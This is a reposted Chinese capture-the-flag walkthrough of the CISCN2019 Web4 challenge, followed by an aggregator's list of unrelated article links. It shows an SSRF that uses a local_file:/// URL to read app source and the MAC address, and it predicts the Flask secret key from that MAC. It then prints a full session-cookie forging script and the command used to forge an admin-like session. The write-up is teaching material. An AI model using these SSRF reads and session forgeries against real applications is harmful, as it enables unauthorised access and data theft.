[CISCN2019 华东南赛区]Web41

进入题目页面如下

点击链接但发现

各种尝试无果

看了一个大佬的博客,链接如下

BUUCTF:[CISCN2019 华东南赛区]Web4-CSDN博客

给了很大的提示,大佬尝试了file:///etc/passwd无果,猜测Flask,尝试local_file:///读取文件local_file:///app/app.py读取源码

http://18a1107d-1b0f-462c-8a9b-def3456fe0da.node5.buuoj.cn:81/read?url=local_file:///app/app.py

源码如下,进行代码审计

import re, random, uuid, urllib
# 导入所需的模块:
# re 模块用于正则表达式操作,可进行字符串的匹配和搜索
# random 模块用于生成随机数
# uuid 模块用于生成通用唯一识别码(UUID)
# urllib 模块用于处理 URL 请求from flask import Flask, session, request
# 从 flask 框架中导入 Flask 类用于创建 Flask 应用
# session 用于管理用户会话
# request 用于获取客户端请求的信息app = Flask(__name__)
# 创建一个 Flask 应用实例random.seed(uuid.getnode())
# 使用计算机的 MAC 地址作为随机数生成器的种子,使随机数的生成具有一定的可预测性(基于当前设备)app.config['SECRET_KEY'] = str(random.random()*233)
# 为 Flask 应用设置一个用于加密会话的密钥,密钥是一个由随机数乘以 233 后转换为字符串的值app.debug = True
# 开启 Flask 应用的调试模式,方便开发过程中定位问题@app.route('/')
# 定义一个路由,当用户访问应用的根路径(即 http://example.com/ )时会触发以下函数
def index():session['username'] = 'www-data'# 在会话中设置用户名为 'www-data'return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'# 返回一个包含超链接的 HTML 字符串,提示用户点击链接读取内容@app.route('/read')
# 定义一个路由,当用户访问 /read 路径时会触发以下函数
def read():try:url = request.args.get('url')# 从客户端请求的 URL 参数中获取 'url' 参数的值m = re.findall('^file.*', url, re.IGNORECASE)# 使用正则表达式检查获取的 URL 是否以 'file' 开头(不区分大小写)n = re.findall('flag', url, re.IGNORECASE)# 使用正则表达式检查获取的 URL 是否包含 'flag' 字符串(不区分大小写)if m or n:return 'No Hack'# 如果 URL 以 'file' 开头或者包含 'flag' 字符串,返回 'No Hack' 提示信息,防止潜在的攻击res = urllib.urlopen(url)# 尝试打开用户提供的 URL 并获取响应对象return res.read()# 读取响应内容并返回给客户端except Exception as ex:print str(ex)# 如果在上述操作过程中出现异常,打印异常信息return 'no response'# 如果出现异常或者没有成功获取到响应,返回 'no response' 提示信息@app.route('/flag')
# 定义一个路由,当用户访问 /flag 路径时会触发以下函数
def flag():if session and session['username'] == 'fuck':# 检查会话是否存在,并且会话中的用户名是否为 'fuck'return open('/flag.txt').read()# 如果条件满足,读取 /flag.txt 文件的内容并返回给客户端else:return 'Access denied'# 如果条件不满足,返回 'Access denied' 提示信息,拒绝用户访问if __name__=='__main__':app.run(debug=True,host="0.0.0.0")# 如果该脚本作为主程序运行,启动 Flask 应用# 开启调试模式,允许外部网络访问应用
  • 使用 uuid.getnode() 作为随机数种子来生成会话密钥。由于 uuid.getnode() 返回的是计算机的 MAC 地址,是一个相对固定的值,这使得生成的随机数具有一定的可预测性。攻击者如果知道了服务器的 MAC 地址,就有可能猜测出会话密钥,从而伪造会话。
  • 使用更安全的随机数生成方式,例如 os.urandom() 来生成会话密钥

读取Mac的地址

local_file:///sys/class/net/eth0/address

使用Python2得出密钥,不能使用python3,因为代码中使用了 urllib.urlopen(),在 Python 3 中该函数已经被 urllib.request.urlopen() 替代,代码可能在 Python 3 环境下无法正常运行

import random
random.seed(0x0242ae0295f6)
print(str(random.random()*233))

得到82.56599527038603

用flask_session_cookie_manager伪造session

使用脚本伪造,恕我有点小白,脚本使用了这位大佬的[CISCN2019 华东南赛区]Web4_[ciscn 2019华东南]web4-CSDN博客

#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4from abc import ABCMeta, abstractmethod
else: # > 3.4from abc import ABC, abstractmethod# Lib for argument parsing
import argparse# external Imports
from flask.sessions import SecureCookieSessionInterfaceclass MockApp(object):def __init__(self, secret_key):self.secret_key = secret_keyif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4class FSCM(metaclass=ABCMeta):def encode(secret_key, session_cookie_structure):""" Encode a Flask session cookie """try:app = MockApp(secret_key)session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))si = SecureCookieSessionInterface()s = si.get_signing_serializer(app)return s.dumps(session_cookie_structure)except Exception as e:return "[Encoding error] {}".format(e)raise edef decode(session_cookie_value, secret_key=None):""" Decode a Flask cookie  """try:if(secret_key==None):compressed = Falsepayload = session_cookie_valueif payload.startswith('.'):compressed = Truepayload = payload[1:]data = payload.split(".")[0]data = base64_decode(data)if compressed:data = zlib.decompress(data)return dataelse:app = MockApp(secret_key)si = SecureCookieSessionInterface()s = si.get_signing_serializer(app)return s.loads(session_cookie_value)except Exception as e:return "[Decoding error] {}".format(e)raise e
else: # > 3.4class FSCM(ABC):def encode(secret_key, session_cookie_structure):""" Encode a Flask session cookie """try:app = MockApp(secret_key)session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))si = SecureCookieSessionInterface()s = si.get_signing_serializer(app)return s.dumps(session_cookie_structure)except Exception as e:return "[Encoding error] {}".format(e)raise edef decode(session_cookie_value, secret_key=None):""" Decode a Flask cookie  """try:if(secret_key==None):compressed = Falsepayload = session_cookie_valueif payload.startswith('.'):compressed = Truepayload = payload[1:]data = payload.split(".")[0]data = base64_decode(data)if compressed:data = zlib.decompress(data)return dataelse:app = MockApp(secret_key)si = SecureCookieSessionInterface()s = si.get_signing_serializer(app)return s.loads(session_cookie_value)except Exception as e:return "[Decoding error] {}".format(e)raise eif __name__ == "__main__":# Args are only relevant for __main__ usage## Description for helpparser = argparse.ArgumentParser(description='Flask Session Cookie Decoder/Encoder',epilog="Author : Wilson Sumanang, Alexandre ZANNI")## prepare sub commandssubparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')## create the parser for the encode commandparser_encode = subparsers.add_parser('encode', help='encode')parser_encode.add_argument('-s', '--secret-key', metavar='<string>',help='Secret key', required=True)parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',help='Session cookie structure', required=True)## create the parser for the decode commandparser_decode = subparsers.add_parser('decode', help='decode')parser_decode.add_argument('-s', '--secret-key', metavar='<string>',help='Secret key', required=False)parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',help='Session cookie value', required=True)## get argsargs = parser.parse_args()## find the option chosenif(args.subcommand == 'encode'):if(args.secret_key is not None and args.cookie_structure is not None):print(FSCM.encode(args.secret_key, args.cookie_structure))elif(args.subcommand == 'decode'):if(args.secret_key is not None and args.cookie_value is not None):print(FSCM.decode(args.cookie_value,args.secret_key))elif(args.cookie_value is not None):print(FSCM.decode(args.cookie_value))
python2 flask_session_cookie_manager2.py decode -c eyJ1c2VybmFtZSI6eyIgYiI6ImQzZDNMV1JoZEdFPSJ9fQ.YdZsQA.3YV7psQpIvWF7UrSmJLd3p7_mUU

在终端运行

encode -s 82.56599527038603 -t "{'username':b'fuck'}"

得到伪造session

使用burp suite抓包并修改session,然后放行,再访问flag最终拿到flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/893763.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

make controller vibrate and 判断是否grab

make controller vibrate and 判断是否grab

我自己的例子&#xff0c;新建cube上挂载oculus交互的代码&#xff0c;如下 然后加载自己写的代码到cube上就可以了 using Oculus.Interaction.HandGrab; using System.Collections; using System.Collections.Generic; using UnityEngine;public class Vibtation : MonoBehav…
阅读更多...
基于C++的DPU医疗领域编程初探

基于C++的DPU医疗领域编程初探

一、大型医院数据处理困境与 DPU 的崛起 在数字化浪潮的席卷下,医疗行业正经历着深刻变革,大型医院作为医疗服务的核心枢纽,积累了海量的数据,涵盖患者的基本信息、诊断记录、检验报告、影像资料等多个维度。这些数据不仅规模庞大,而且增长速度迅猛,传统的中央处理器(C…
阅读更多...
【记录】日常|从零散记录到博客之星Top300的成长之路

【记录】日常|从零散记录到博客之星Top300的成长之路

文章目录 shandianchengzi 2024 年度盘点概述写作风格简介2024年的创作内容总结 shandianchengzi 2024 年度盘点 概述 2024年及2025年至今我创作了786即84篇文章&#xff0c;加上这篇就是85篇。 很荣幸这次居然能够入选博客之星Top300&#xff0c;这个排名在我之前的所有年份…
阅读更多...
详解最基本的数据顺序存储结构:顺序表

详解最基本的数据顺序存储结构:顺序表

新的一年&#xff0c;我觉得这张图很合适&#xff01;有梦想&#xff0c;敢拼&#xff0c;马上就是除夕了&#xff0c;希望新的一年我们逢考必过&#xff0c;事事顺心&#xff0c;看见朝阳的你是不是嘴角微微上扬&#xff01; 本篇从0基础白话文讲述顺序表的概念、用法、注意事…
阅读更多...
字节跳动发布UI-TARS,超越GPT-4o和Claude,能接管电脑完成复杂任务

字节跳动发布UI-TARS,超越GPT-4o和Claude,能接管电脑完成复杂任务

每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗&#xff1f;订阅我们的简报&#xff0c;深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同&#xff0c;从行业内部的深度分析和实用指南中受益。不要错过这个机会&#xff0c;成为AI领…
阅读更多...
移动光猫怎么自己改桥接模式?

移动光猫怎么自己改桥接模式?

环境&#xff1a; 型号H3-8s 问题描述&#xff1a; 家里宽带用的是H3-8s 光猫&#xff0c;想改桥接模式。 解决方案&#xff1a; 1.默认管理员账号和密码&#xff1a; 账号&#xff1a;CMCCAdmin 密码&#xff1a;aDm8H%MdAWEB页面我试了登陆不了&#xff0c;显示错误 …
阅读更多...
【Java数据结构】排序

【Java数据结构】排序

【Java数据结构】排序 一、排序1.1 排序的概念1.2 排序的稳定性1.3 内部排序和外部排序1.3.1 内部排序1.3.2 外部排序 二、插入排序2.1 直接插入排序2.2 希尔排序 三、选择排序3.1 选择排序3.2 堆排序 四、交换排序4.1 冒泡排序4.2 快速排序Hoare法&#xff1a;挖坑法&#xff…
阅读更多...
Java数据结构 (链表反转(LinkedList----Leetcode206))

Java数据结构 (链表反转(LinkedList----Leetcode206))

1. 链表的当前结构 每个方框代表一个节点&#xff0c;每个节点包含两个部分&#xff1a; 左侧的数字&#xff1a;节点存储的值&#xff0c;例如 45、34 等。右侧的地址&#xff08;如 0x90&#xff09;&#xff1a;表示该节点 next 指针指向的下一个节点的内存地址。 例子中&a…
阅读更多...
Linux查看服务器的内外网地址

Linux查看服务器的内外网地址

目录&#xff1a; 1、内网地址2、外网地址3、ping时显示地址与真实不一致 1、内网地址 ifconfig2、外网地址 curl ifconfig.me3、ping时显示地址与真实不一致 原因是dns缓存导致的&#xff0c;ping这种方法也是不准确的&#xff0c;有弊端不建议使用&#xff0c;只适用于测试…
阅读更多...
微服务学习-服务调用组件 OpenFeign 实战

微服务学习-服务调用组件 OpenFeign 实战

1. OpenFeign 接口方法编写规范 1.1. 在编写 OpenFeign 接口方法时&#xff0c;需要遵循以下规范 1.1.1.1. 接口中的方法必须使用 RequestMapping、GetMapping、PostMapping 等注解声明 HTTP 请求的类型。 1.1.1.2. 方法的参数可以使用 RequestParam、RequestHeader、PathVa…
阅读更多...
基于C语言的数组从入门到精通

基于C语言的数组从入门到精通

简介:本篇文章主要介绍了一维数组,二维数组,字符数组的定义,数组的应用,数组的核心代码解析,适用于0基础的初学者. C语言数组 1.一维数组 1.1定义 1.1.1声明 语法:数据类型 数组名[数组大小];示例:int arr[5]; 1.1.2初始化 a.静态初始化 完全初始化&#xff1a;int arr[5] {1…
阅读更多...
音频入门(二):音频数据增强

音频入门(二):音频数据增强

本文介绍了一些常见的音频数据增强方法&#xff0c;并给出了代码实现。 目录 一、简介 二、代码 1. 安装必要的库 2. 代码 3. 各函数的介绍 4. 使用方法 参考&#xff1a; 一、简介 音频数据增强是机器学习和深度学习领域中用于改善模型性能和泛化能力的技术。 使用数据…
阅读更多...
Go中new和make的区别对比

Go中new和make的区别对比

Go 中 new 和 make 的区别 在 Go 语言中&#xff0c;new 和 make 都用于分配内存&#xff0c;但它们的使用场景和行为有显著的区别。 1. new 定义 new 是 Go 语言中的一个内置函数&#xff0c;用于分配内存并返回指向该内存的指针。new 分配的内存会被初始化为零值。 作用…
阅读更多...
消息队列篇--通信协议篇--AMOP(交换机,队列绑定,消息确认,AMOP实现实例,AMOP报文,帧,AMOP消息传递模式等)

消息队列篇--通信协议篇--AMOP(交换机,队列绑定,消息确认,AMOP实现实例,AMOP报文,帧,AMOP消息传递模式等)

AMQP&#xff08;Advanced Message Queuing Protocol&#xff0c;高级消息队列协议&#xff09;是一种开放的、跨平台的消息传递协议&#xff0c;旨在提供一种标准化的方式在不同的消息代理和客户端之间进行消息传递。AMQP不仅定义了消息格式和路由机制&#xff0c;还规定了如何…
阅读更多...
LLaMA-Factory 微调LLaMA3

LLaMA-Factory 微调LLaMA3

LoRA介绍 LoRA&#xff08;Low-Rank Adaptation&#xff09;是一种用于大模型微调的技术&#xff0c; 通过引入低秩矩阵来减少微调时的参数量。在预训练的模型中&#xff0c; LoRA通过添加两个小矩阵B和A来近似原始的大矩阵ΔW&#xff0c;从而减 少需要更新的参数数量。具体来…
阅读更多...
【项目实战】—— 高并发内存池设计与实现

【项目实战】—— 高并发内存池设计与实现

目录 一&#xff0c;项目介绍 1.1 关于高并发内存池 1.2 关于池化技术 1.3 关于malloc 二&#xff0c;定长内存池实现 2.1 实现详情 ​2.2 完整代码 三&#xff0c;高并发内存池整体设计 四&#xff0c;threadcache设计 4.1 整体设计 4.2 哈希桶映射对齐规则 4.3 …
阅读更多...
设计模式的艺术-代理模式

设计模式的艺术-代理模式

结构性模式的名称、定义、学习难度和使用频率如下表所示&#xff1a; 1.如何理解代理模式 代理模式&#xff08;Proxy Pattern&#xff09;&#xff1a;给某一个对象提供一个代理&#xff0c;并由代理对象控制对原对象的引用。代理模式是一种对象结构型模式。 代理模式类型较多…
阅读更多...
计算机网络 (54)系统安全:防火墙与入侵检测

计算机网络 (54)系统安全:防火墙与入侵检测

前言 计算机网络系统安全是确保网络通信和数据不受未经授权访问、泄露、破坏或篡改的关键。防火墙和入侵检测系统&#xff08;IDS&#xff09;是维护网络系统安全的两大核心组件。 一、防火墙 定义与功能 防火墙是一种用来加强网络之间访问控制的特殊网络互联设备&#xff0c;它…
阅读更多...
three.js+WebGL踩坑经验合集(3):THREE.Line的射线检测问题(不是阈值方面的,也不是难选中的问题)

three.js+WebGL踩坑经验合集(3):THREE.Line的射线检测问题(不是阈值方面的,也不是难选中的问题)

笔者之所以要在标题里强调不是阈值方面&#xff0c;是因为网上的大多数文章提到线的射线检测问题&#xff0c;90%以上的文章都说是因为线太细所以难选中&#xff0c;然后让大家把线的阈值调大。 而本文所要探讨的问题则恰好相反&#xff0c;不是难选中&#xff0c;而是在某些角…
阅读更多...
省市区三级联动

省市区三级联动

引言 在网页中&#xff0c;经常会遇到需要用户选择地区的场景&#xff0c;如注册表单、地址填写等。为了提供更好的用户体验&#xff0c;我们可以实现一个三级联动的地区选择器&#xff0c;让用户依次选择省份、城市和地区。 效果展示&#xff1a; 只有先选择省份后才可以选择…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023